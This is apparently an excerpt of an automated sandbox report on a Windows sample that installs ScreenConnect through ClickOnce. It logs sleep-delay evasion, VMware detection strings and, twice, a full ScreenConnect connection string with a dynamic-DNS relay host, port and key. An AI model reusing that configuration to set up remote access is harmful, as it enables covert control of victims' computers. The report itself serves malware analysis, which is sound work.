Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720 Thread sleep time: -598091s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720 Thread sleep time: -597935s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720 Thread sleep time: -597827s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720 Thread sleep time: -597711s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720 Thread sleep time: -597607s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720 Thread sleep time: -597500s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720 Thread sleep time: -597390s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720 Thread sleep time: -597275s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720 Thread sleep time: -597171s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720 Thread sleep time: -597062s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720 Thread sleep time: -596952s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720 Thread sleep time: -596842s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720 Thread sleep time: -596734s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720 Thread sleep time: -596624s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720 Thread sleep time: -596514s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720 Thread sleep time: -596396s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720 Thread sleep time: -596265s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720 Thread sleep time: -596155s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720 Thread sleep time: -596045s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720 Thread sleep time: -595928s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720 Thread sleep time: -595812s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720 Thread sleep time: -595627s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720 Thread sleep time: -595498s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720 Thread sleep time: -595375s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720 Thread sleep time: -595263s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720 Thread sleep time: -595155s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720 Thread sleep time: -595045s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720 Thread sleep time: -594936s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720 Thread sleep time: -594826s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720 Thread sleep time: -594718s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720 Thread sleep time: -594608s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720 Thread sleep time: -594499s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720 Thread sleep time: -594390s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720 Thread sleep time: -594280s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720 Thread sleep time: -594165s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720 Thread sleep time: -594061s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720 Thread sleep time: -593952s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720 Thread sleep time: -593843s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720 Thread sleep time: -593731s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720 Thread sleep time: -593621s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720 Thread sleep time: -593515s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720 Thread sleep time: -593405s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720 Thread sleep time: -593296s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720 Thread sleep time: -593186s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720 Thread sleep time: -593069s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720 Thread sleep time: -592963s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7968 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe TID: 6788 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe TID: 6044 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe TID: 340 Thread sleep count: 218 > 30
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe TID: 340 Thread sleep count: 80 > 30
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe TID: 7112 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe TID: 7784 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0 Jump to behavior
Source: C:\Users\user\Desktop\96r3GgxntQ.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\96r3GgxntQ.exe Code function: 0_2_00BB4A4B FindFirstFileExA, 0_2_00BB4A4B
Source: C:\Users\user\Desktop\96r3GgxntQ.exe Thread delayed: delay time: 40000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 599874 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 599764 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 599531 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 599122 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 598515 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 598211 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 598091 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 597935 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 597827 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 597711 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 597607 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 597500 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 597390 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 597275 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 597171 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 597062 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 596952 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 596842 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 596734 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 596624 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 596514 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 596396 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 596265 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 596155 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 596045 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 595928 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 595812 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 595627 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 595498 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 595375 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 595263 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 595155 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 595045 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 594936 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 594826 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 594718 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 594608 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 594499 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 594390 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 594280 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 594165 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 594061 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 593952 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 593843 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 593731 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 593621 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 593515 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 593405 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 593296 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 593186 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 593069 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 592963 Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe File opened: C:\Users\user\ Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe File opened: C:\Users\user\AppData\Local\Apps\2.0\ Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe File opened: C:\Users\user\AppData\Local\ Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe File opened: C:\Users\user\AppData\Local\Apps\ Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe File opened: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\ Jump to behavior
Source: Amcache.hve.6.dr Binary or memory string: VMware
Source: Amcache.hve.6.dr Binary or memory string: VMware-42 27 b7 a3 1e b0 86 f3-0a fe 06 07 d0 80 07 92
Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.6.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.6.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: ScreenConnect.ClientService.exe, 0000000C.00000002.1791698285.0000000001201000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAqHcYWWhYxk2TTZ0IUUwtAgAAAAACAAAAAAAQZgAAAAEAACAAAAA8RpQg4oVFt9XPJUqpRcLW3DIrmMd0AaOuiVw%2fGXINGgAAAAAOgAAAAAIAACAAAACCdOZgHqpMcodqURrATYqRaZ4JQtghWNz8cMf6Hht5OaAEAADkPzZ5KvtcppXqUipZJdeh0dLZKHX8xGwn55uGAFs3AvjhhrIcVvhoZdVrWG8EwKBPp3RQ%2bdGeg%2fcuTe0Hgq7TG8W0lgWTvrMRkGNR%2bUk2SQeBVYOuLlSGV1nqSHvAI6FNozpNsPfRWTNYbOqmqSXg9i60jlJrMYXulGpJblT3x1F2BFUhsn3DLm1J87nUrkBx%2bhJHRl0q4uYV2WTaCEGX4f9COqXCkBPMr9Jvr2yHYT48hoDtAY54Ue2PS%2f8e9hNYkjAiYY7dA9B5rdqaYikmhJEFlf0%2b2hq5N%2fYBnoRL8ZUJKaCpoGMX7xbyLKBpU1hDpPgV5boa2Ph8nXgxqOYU1CHbYcHatfrGy3LOwcVkM9yP3awjcm%2bksXISEhgBOZpm6uObIeQZtRuea2IPlZyZqqfuPciCcj4Z%2fb99T0T9qhzCCN4g6kostExDRqpg0RVP3BwUhh7yerLoJgd%2ftni%2fTbVUED66WGCbeKfS7VZTSUsdmg7EwOa9gElUHjNYksS2QNWQWVBadhHIPj9ppLdv6Jl2m8Efemrrcv4UJcJoHUYQq%2fqw0jEx2qEtsj1A0i4UpbRkrf1HzVKOf2U1rQFkBEgTSTnldv3zyCmNxfSz3tK3Qfyp2mzxRDVnvDeEtzwfZZALz%2bs7k76sCavOBFusk7B9%2fer%2b6fuzXJGdHn%2b0nrha9T95dI9YwA9AMFbz76jd%2fnrrIVqAUpJEfY1sfQLULMYXjFOaVvmtukTmBbLY1sYXIaR6zrTdwBLDRVc3bY2ShCuTOH5PQHQIapWygT37GTq68oi%2b6Dda6yhq%2fyXOd8T%2by41IeuOwRDyuJMPpfBQTsAJ0827u9dksK7UBhB2AXvyezcpuiTv%2f8zRvkRagmbBiK9pe9dAbbpaBMRD8pAdotjVDW5fJ9sfV2nHnHLJ9sDPBGTEy%2fkzjr6AfBe%2fdg45Om2pU6B4DxLn%2fv%2fqwYed548Qj6TB6o0COi24fHizlGPc%2bcfR0SbTgLl4avKsNur7DydrHV1HQTm7ZaTZx14iJQ2%2b8Rj3DMXov8JNlZcQvcyWugYXdt0c%2fYRBjsTKtGBCM06rpYs2BXcY3gBPle%2fMcm%2fphZipIpXAsqVaA8FC2fe5frvFojbT7Fr%2fKsUXp6brNP65sBjrp5CEELNTP71wQJR8e4QW7POdg2sPW2duEDagVur8Z%2fTq3IpdBotASVtA%2fy93iotYmUFJ2Pqq2HhMyG%2fSCBRUHcW4EUd393OAIuLy4ofjR%2b0Pe%2bkhd%2fGnueYhyuAVOjWMjPLxX4jpjkef5gJMjB8I00geWxeOSi%2bLGb42tVUwaibLbLLKKTNOsg8XZdUEP5NhZgIWlFytQ4uIyXwpcXYYpYKTaLR1V6kY2VuTXMcBqvmadraa3uqXqemUkhsF5ZQbREd47%2bSoo6ne3zAVNteDJnfv7IAwbSwOB%2bB1ODuP31NWONE%2bTHgMHQNtGxaf1JEIZsPsd8MwtR4J11oD7kE5asaRj4s1W21pi5CUpRXO87k%2bkRTOkAesVozYVKbs1%2faCV6RXLb69M9YMHxNHsKElL0UrEYr50aw5exOuW8%2f%2fhXM1dH%2faXcBM7n0AAAACz8BeRgb%2fOBzs7iBHxh2WBDwOYoDUImIyOSubXC8JfgkRG2dsngc9c1uFkbPP9rh7T8m%2fVIse9uv1s4dpHi%2bXM&r=&i=Untitled%2520Session
Source: Amcache.hve.6.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: dfsvc.exe, 00000002.00000002.2256734540.00000276A4261000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2252252771.00000276A2AF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2610724033.0000025CF7A57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2608059765.000001CEA28D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: ScreenConnect.ClientService.exe, 0000000C.00000002.1791698285.0000000001201000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAqHcYWWhYxk2TTZ0IUUwtAgAAAAACAAAAAAAQZgAAAAEAACAAAAA8RpQg4oVFt9XPJUqpRcLW3DIrmMd0AaOuiVw%2fGXINGgAAAAAOgAAAAAIAACAAAACCdOZgHqpMcodqURrATYqRaZ4JQtghWNz8cMf6Hht5OaAEAADkPzZ5KvtcppXqUipZJdeh0dLZKHX8xGwn55uGAFs3AvjhhrIcVvhoZdVrWG8EwKBPp3RQ%2bdGeg%2fcuTe0Hgq7TG8W0lgWTvrMRkGNR%2bUk2SQeBVYOuLlSGV1nqSHvAI6FNozpNsPfRWTNYbOqmqSXg9i60jlJrMYXulGpJblT3x1F2BFUhsn3DLm1J87nUrkBx%2bhJHRl0q4uYV2WTaCEGX4f9COqXCkBPMr9Jvr2yHYT48hoDtAY54Ue2PS%2f8e9hNYkjAiYY7dA9B5rdqaYikmhJEFlf0%2b2hq5N%2fYBnoRL8ZUJKaCpoGMX7xbyLKBpU1hDpPgV5boa2Ph8nXgxqOYU1CHbYcHatfrGy3LOwcVkM9yP3awjcm%2bksXISEhgBOZpm6uObIeQZtRuea2IPlZyZqqfuPciCcj4Z%2fb99T0T9qhzCCN4g6kostExDRqpg0RVP3BwUhh7yerLoJgd%2ftni%2fTbVUED66WGCbeKfS7VZTSUsdmg7EwOa9gElUHjNYksS2QNWQWVBadhHIPj9ppLdv6Jl2m8Efemrrcv4UJcJoHUYQq%2fqw0jEx2qEtsj1A0i4UpbRkrf1HzVKOf2U1rQFkBEgTSTnldv3zyCmNxfSz3tK3Qfyp2mzxRDVnvDeEtzwfZZALz%2bs7k76sCavOBFusk7B9%2fer%2b6fuzXJGdHn%2b0nrha9T95dI9YwA9AMFbz76jd%2fnrrIVqAUpJEfY1sfQLULMYXjFOaVvmtukTmBbLY1sYXIaR6zrTdwBLDRVc3bY2ShCuTOH5PQHQIapWygT37GTq68oi%2b6Dda6yhq%2fyXOd8T%2by41IeuOwRDyuJMPpfBQTsAJ0827u9dksK7UBhB2AXvyezcpuiTv%2f8zRvkRagmbBiK9pe9dAbbpaBMRD8pAdotjVDW5fJ9sfV2nHnHLJ9sDPBGTEy%2fkzjr6AfBe%2fdg45Om2pU6B4DxLn%2fv%2fqwYed548Qj6TB6o0COi24fHizlGPc%2bcfR0SbTgLl4avKsNur7DydrHV1HQTm7ZaTZx14iJQ2%2b8Rj3DMXov8JNlZcQvcyWugYXdt0c%2fYRBjsTKtGBCM06rpYs2BXcY3gBPle%2fMcm%2fphZipIpXAsqVaA8FC2fe5frvFojbT7Fr%2fKsUXp6brNP65sBjrp5CEELNTP71wQJR8e4QW7POdg2sPW2duEDagVur8Z%2fTq3IpdBotASVtA%2fy93iotYmUFJ2Pqq2HhMyG%2fSCBRUHcW4EUd393OAIuLy4ofjR%2b0Pe%2bkhd%2fGnueYhyuAVOjWMjPLxX4jpjkef5gJMjB8I00geWxeOSi%2bLGb42tVUwaibLbLLKKTNOsg8XZdUEP5NhZgIWlFytQ4uIyXwpcXYYpYKTaLR1V6kY2VuTXMcBqvmadraa3uqXqemUkhsF5ZQbREd47%2bSoo6ne3zAVNteDJnfv7IAwbSwOB%2bB1ODuP31NWONE%2bTHgMHQNtGxaf1JEIZsPsd8MwtR4J11oD7kE5asaRj4s1W21pi5CUpRXO87k%2bkRTOkAesVozYVKbs1%2faCV6RXLb69M9YMHxNHsKElL0UrEYr50aw5exOuW8%2f%2fhXM1dH%2faXcBM7n0AAAACz8BeRgb%2fOBzs7iBHxh2WBDwOYoDUImIyOSubXC8JfgkRG2dsngc9c1uFkbPP9rh7T8m%2fVIse9uv1s4dpHi%2bXM&r=&i=Untitled%2520Session"
Source: Amcache.hve.6.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
